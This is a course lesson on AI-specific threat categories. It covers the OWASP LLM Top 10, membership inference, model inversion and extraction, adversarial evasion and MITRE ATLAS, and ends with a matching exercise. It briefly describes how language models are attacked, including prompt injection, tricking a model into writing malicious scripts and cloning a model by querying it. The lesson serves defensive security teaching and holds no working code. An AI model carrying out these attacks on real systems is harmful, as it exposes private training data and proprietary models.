
Module 3 Lesson 3: AI-Specific Threat Categories
Meet the new class of vulnerabilities. Explore unique AI threats recognized by OWASP and MITRE ATLAS, including Membership Inference and Model Extraction.
Module 3 Lesson 3: AI-Specific Threat Categories
Beyond STRIDE, several security organizations have defined AI-specific threat lists. Understanding these categories is essential for professional auditing.
graph TD
subgraph "AI Threat Pillars"
I[Injection] --- I1[Prompt Injection]
I --- I2[Indirect Injection]
I --- I3[Tool Injection]
E[Extraction] --- E1[Model Stealing]
E --- E2[Weight Theft]
E --- E3[Data Reconstruction]
F[Inference] --- F1[Membership Inference]
F --- F2[Attribute Inference]
end
1. The OWASP Top 10 for LLMs
The Open Web Application Security Project (OWASP) has a specific list for Large Language Models. Key entries include:
- LLM01: Prompt Injection: Manipulating the model via input.
- LLM02: Insecure Output Handling: Trusting the LLM's output without validation (leading to XSS or remote code execution).
- LLM06: Sensitive Information Disclosure: The model revealing its training data or system secrets.
2. Inversion & Inference (Privacy Attacks)
These are mathematically unique to AI:
- Membership Inference: An attacker can determine if a specific person's data (e.g., your medical record) was part of the training set by looking at how the model responds to certain queries.
- Model Inversion: Trying to reconstruct an image or text from the training set by querying the model's outputs.
3. Extraction (Intellectual Property Attacks)
- Model Extraction/Stealing: An attacker queries your expensive, proprietary model thousands of times and uses the answers to train their own "Clone" model for free.
- Target: Your company's unique R&D and logic encoded in the weights.
4. Adversarial Evasion
- The "Invisible" Man: Changing a few pixels on a digital face so an AI "sees" a different person, but a human sees no change.
- The "Silent" Word: Adding a hidden frequency to an audio file that tells an AI to "Unlock the door," but sounds like music to a human.
5. MITRE ATLAS
Just as there is MITRE ATT&CK for traditional hacking, MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) maps the tactics and techniques used by AI attackers. It includes stages like:
- Reconnaissance: Gathering info on the target model.
- Initial Access: Getting a prompt into the system.
- Impact: The final damage (e.g., data theft or system shutdown).
Exercise: The Threat Matcher
- Match the following scenarios to the categories above:
- "An attacker clones your AI chatbot for $10." -> ?
- "An attacker finds out your CEO is in the training data." -> ?
- "A user tricks the AI into writing a malicious script." -> ?
- Why is "Insecure Output Handling" just as dangerous as "Prompt Injection"?
- Download the OWASP Top 10 for LLM PDF. Which threat do you think is the easiest to fix?
- Research: What is the "Adversarial Machine Learning" (AML) community and how do they differ from the "Cybersecurity" community?
Summary
AI threats aren't just "Hacks"; they are often Mathematical Exploits. By categorizing them into extraction, inference, and injection, you can build specific defenses for each type of risk.
Next Lesson: Thinking like the enemy: Adversarial thinking for AI systems.